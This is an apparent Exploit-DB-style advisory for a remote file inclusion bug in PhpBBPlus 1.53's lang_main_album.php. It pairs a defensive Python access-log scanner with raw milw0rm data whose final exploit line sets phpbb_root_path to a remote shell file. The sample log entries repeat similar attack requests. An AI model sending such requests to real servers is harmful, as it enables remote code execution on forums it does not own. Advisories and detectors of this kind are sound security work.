Vendor: PhpBBPlus
By: Mehrad Ansari Targhi
CVSS: 7.5 (HIGH)
CWE: RFI (Remote File Inclusion)
Product Name: PhpBBPlus
Affected Version From: PhpBBPlus 1.53
Affected Version To: PhpBBPlus 1.53
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

RFI Bug in PhpBBPlus

The RFI bug is present in the lang_main_album.php file of PhpBBPlus version 1.53. It can be exploited by appending a malicious URL as the value for the 'phpbb_root_path' parameter. This can allow an attacker to include remote files and potentially execute arbitrary code.

Mitigation:

The vendor should release a patch to fix the RFI vulnerability. In the meantime, users are advised to update to the latest version of PhpBBPlus and apply any available security patches. It is also recommended to implement proper input validation and sanitization to prevent remote file inclusion attacks.
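With no patch available, attempts against this parameter can at least be spotted in web server access logs. The following is an added example, not code from the advisory or from PhpBBPlus: it flags requests whose 'phpbb_root_path' query parameter carries a URL, stream wrapper or UNC path. The log format (Apache "combined"), the host names and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample entries in Apache "combined" format (assumed log format).
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Sep/2007:10:01:02 +0000] "GET /forum/language/lang_german/lang_main_album.php?phpbb_root_path=http://files.example.test/inc.txt?a= HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.23 - - [20/Sep/2007:10:03:40 +0000] "GET /forum/language/lang_german/lang_main_album.php?phpbb_root_path=%2568ttp%253A%252F%252Ffiles.example.test%252Finc.txt HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.10 - - [20/Sep/2007:10:05:11 +0000] "GET /forum/login.php?redirect=http://forum.example.test/index.php HTTP/1.1" 302 0 "-" "-"',
    '192.0.2.11 - - [20/Sep/2007:10:06:30 +0000] "GET /forum/album.php?phpbb_root_path=./ HTTP/1.1" 200 900 "-" "-"',
]

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Value starts with a scheme of two or more characters (http:, ftp:, php:, data:),
# a protocol-relative "//" or a UNC "\\" prefix, i.e. not a local relative directory.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]+:|//|\\\\)', re.IGNORECASE)
PARAM = "phpbb_root_path"


def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp) up to a small bound."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(lines):
    """Return (client_ip, path, decoded_value) for each request whose
    phpbb_root_path query parameter points at a remote resource."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        parts = urlsplit(m.group("target"))
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            value = fully_unquote(value)
            if fully_unquote(key) == PARAM and REMOTE_RE.match(value):
                hits.append((m.group("ip"), parts.path, value))
    return hits
```

Access logs record only the query string, so a value sent in a request body is not visible to this check.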
Source

Exploit-DB raw data:

AUTHOR = Mehrad Ansari Targhi
E-Mail : mehrad1989@gmail.com
My Yahoo Messenger ID : mehrad_1989

Script Download URL : http://www.phpbbplus.net/PhpBBPlus1.53.zip

This Is An RFI Bug.
This Bug Is In : [ PHPBBPLUS INSTALLED ]/language/lang_german/lang_main_album.php

Exploit : http://[PHPPLUS]/language/lang_german/lang_main_album.php?phpbb_root_path=[ http://shell.txt]?a=

# milw0rm.com [2007-09-20]